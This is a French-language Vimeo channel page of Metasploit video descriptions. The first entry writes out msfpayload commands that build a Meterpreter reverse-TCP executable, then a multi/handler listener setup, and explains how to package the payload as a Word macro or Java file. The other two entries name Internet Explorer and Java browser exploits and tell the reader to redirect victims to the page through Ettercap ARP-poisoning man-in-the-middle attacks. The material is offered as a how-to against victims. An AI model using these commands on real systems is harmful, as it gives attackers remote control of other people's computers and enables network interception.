1. Cette vidéo vous explique comment créer un serveur Meterpreter (vous pouvez changer l'exploit), lorsque le serveur sera executé, vous pourrez lancer le payload de votre choix.
    Liste des commandes :

    [ Cygwin Shell : ]
    "msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.25 x>meterpreter_reverse.exe"
    "chmod +x meterpreter_reverse.exe"

    [ MSF Console : ]
    "use multi/handler"
    "set payload windows/meterpreter/reverse_tcp"
    "set LHOST 192.168.1.25"
    "show options"
    "exploit"

    Le X dans le Cygwin shell (... X>meterpre...) correspond à l'encodage du payload, ici éxécutable. Vous pouvez mettre V pour VB avec une extension .bas pour un macro Word, J pour Java avec une extension .jar pour une application java etc.

    # vimeo.com/8517851 Uploaded 2,287 Plays 0 Comments
  2. Utilisation de la faille Unsafe Scripting à l'aide de l'exploit "windows/browser/ie_unsafe_scripting".
    Pour que la victime aille sur la page, il faut un Man In The Middle avec Ettercap pour la rediriger.
    Désolé, pas de HD :/

    # vimeo.com/8499386 Uploaded 1,041 Plays 0 Comments
  3. Demonstration de l'utilisation de Metasploit avec l'exploit "multi/browser/java_getsoundbank_bof"
    Biensûr la victime n'ira pas sur la page directement, essayez de mettre en place un MITM (Man In The Middle) avec Ettercap, ARP poisoning et enfin rediriger la victime vers la page !
    PS: Désolé pour la mauvaise qualité.

    Java exploit's demonstration using "multi/browser/java_getsoundbank_bof" exploit.
    Of course, the victim will not go to the page so try a MITM (Man In The Middle) with Ettercap, ARP poisoning and then redirect the victim to your page !
    PS: Sorry for bad video quality.

    # vimeo.com/8474606 Uploaded 614 Plays 0 Comments

Metasploit Exploits

Rémi Heneault

Exploitation des failles dans Windows à l'aide du Metasploit Framework 3.3.3

Browse This Channel

Shout Box

Heads up: the shoutbox will be retiring soon. It’s tired of working, and can’t wait to relax. You can still send a message to the channel owner, though!

Channels are a simple, beautiful way to showcase and watch videos. Browse more Channels.